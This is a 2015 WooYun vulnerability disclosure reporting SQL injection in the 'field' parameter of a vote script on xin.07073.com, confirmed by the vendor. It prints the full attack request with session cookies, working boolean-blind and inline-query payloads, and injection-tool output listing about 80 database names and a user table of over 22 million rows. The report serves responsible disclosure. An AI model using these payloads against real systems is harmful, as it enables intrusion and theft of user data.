当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102150

漏洞标题:07073游戏某站SQL注入第三次影响用户数据

相关厂商:07073.com

漏洞作者: BMa

提交时间:2015-03-18 16:23

修复时间:2015-05-02 16:26

公开时间:2015-05-02 16:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-05-02: 细节向公众公开

简要描述:

07073游戏某站SQL注入第三次影响22042115用户数据
无论认不认识我的人都知道,我从不乱脱人家裤子 话说你们用户增长速度挺快的呀
这次可不用延时慢慢跑,这次速度杠杠滴

详细说明:

xin.07073.com


POST /plus/xinyou/dbvote.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://xin.07073.com
Referer: http://xin.07073.com/jingsu/1070711.html
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: xin.07073.com
Cookie: Vote_83=83; Vote_82=82; Vote_78=78; Vote_80=80; Vote_81=81; DEDE_VOTENAME_AAA_83=1; DEDE_VOTENAME_AAA_82=1; DEDE_VOTENAME_AAA_78=1; DEDE_VOTENAME_AAA_80=1; DEDE_VOTENAME_AAA_81=1; CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426660667; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426658832; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22dd2dc1c1fda7746aa70125029bbfeecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426664118%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dd671b910f5f2639f02ce1cc826b1db3f; PHPSESSID=c1d84f440efc45df68df03edd0d78e01; TosoDiggID4464fee0fec20fd7f58de87f7ee96950=1; TosoDiggID4464fee0fec20fd7f58de87f7ee96950__ckMd5=bfee8899ae6851e8; TosoDiggIDb6dd734d69aa9f7266b5678c8db1743e=1; TosoDiggIDb6dd734d69aa9f7266b5678c8db1743e__ckMd5=bfee8899ae6851e8; TosoDiggIDf2872b5d007c756a3288e2f29c27768d=1; TosoDiggIDf2872b5d007c756a3288e2f29c27768d__ckMd5=bfee8899ae6851e8; TosoDiggID96291ddc67d0dae5771856131730259b=1; TosoDiggID96291ddc67d0dae5771856131730259b__ckMd5=bfee8899ae6851e8; TosoDiggID541fb77c001f812da4d251f8d42f3b5b=1; TosoDiggID541fb77c001f812da4d251f8d42f3b5b__ckMd5=bfee8899ae6851e8; TosoDiggIDc723360b1b1a6624c0bda36a46423d6a=1; TosoDiggIDc723360b1b1a6624c0bda36a46423d6a__ckMd5=bfee8899ae6851e8; TosoDiggID2c44d13d392d469bac2f65280f4a639e=1; TosoDiggID2c44d13d392d469bac2f65280f4a639e__ckMd5=bfee8899ae6851e8; TosoDiggIDff3af9de5ce2074c0effe3a95a0e655e=1; TosoDiggIDff3af9de5ce2074c0effe3a95a0e655e__ckMd5=bfee8899ae6851e8; TosoDiggID9a9f466501dd2527465077bcf0896ce0=1; TosoDiggID9a9f466501dd2527465077bcf0896ce0__ckMd5=bfee8899ae6851e8; TosoDiggIDc04cab8cdd56aacf2bf1d3b4bd883933=1; TosoDiggIDc04cab8cdd56aacf2bf1d3b4bd883933__ckMd5=bfee8899ae6851e8
Accept-Encoding: gzip, deflate
Content-Length: 167
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ty=left&field=1&aid=1070711


参数:field

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


field
[16:10:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:10:11] [INFO] fetching current user
[16:10:11] [INFO] retrieved: amdbuser@%
current user:    'amdbuser@%'
available databases [80]:
[*] 123_07073
[*] acg073
[*] adv07073
[*] advertising
[*] android07073
[*] askdata
[*] atlas07073
[*] baidu_xml_dev
[*] baobei
[*] bar07073
[*] bbs073
[*] bl07073
[*] box07073
[*] cache07073
[*] cartoon
[*] coderead
[*] comment
[*] datacenter
[*] db07073
[*] db07073_tx2
[*] db07073qn
[*] dbcache
[*] discuz
[*] dn07073
[*] dnf07073
[*] downloads
[*] duandi
[*] fahao073
[*] fahao10
[*] flash07073
[*] giftcode
[*] hdtemplates
[*] hi07073
[*] huodong
[*] information_schema
[*] iphonewy_x15
[*] iphonewy_x20
[*] jft073
[*] kaifuopen_hzhks
[*] kaifuopen_zjgtqxx
[*] kc07073
[*] kf07073
[*] kf07073b
[*] kf207073
[*] kf521
[*] kf77745
[*] list07073
[*] mesearch
[*] mh073
[*] mobilenews
[*] molihai073
[*] monitor
[*] mysql
[*] nycc
[*] other_website
[*] paihang07073
[*] performance_schema
[*] shop073
[*] sy07073
[*] team07073
[*] tieba
[*] tongji
[*] top2011
[*] tweibo
[*] ui073
[*] wap07073
[*] webbox
[*] weixin073
[*] wenwen073
[*] wow07073
[*] www.13cr.com
[*] www07073
[*] www07073bak
[*] xuan-astd
[*] xweibo
[*] youxi
[*] yxdata
[*] zhuanchu
[*] zhuanchu2
[*] zt07073
sts:
---
Parameter: field (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ty=left&field=1 AND 1811=1811&aid=1070711
    Type: inline query
    Title: MySQL inline queries
    Payload: ty=left&field=(SELECT CONCAT(0x7171787171,(SELECT (ELT(3754=3754,1)
)),0x7178786a71))&aid=1070711
---
[16:12:15] [INFO] testing MySQL
[16:12:15] [INFO] confirming MySQL
[16:12:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:12:15] [INFO] retrieved: 22042115
Database: bbs073
+------------+---------+
| Table      | Entries |
+------------+---------+
| uc_members | 22042115 |
+------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-18 16:25

厂商回复:

感谢提供漏洞信息。

最新状态:

暂无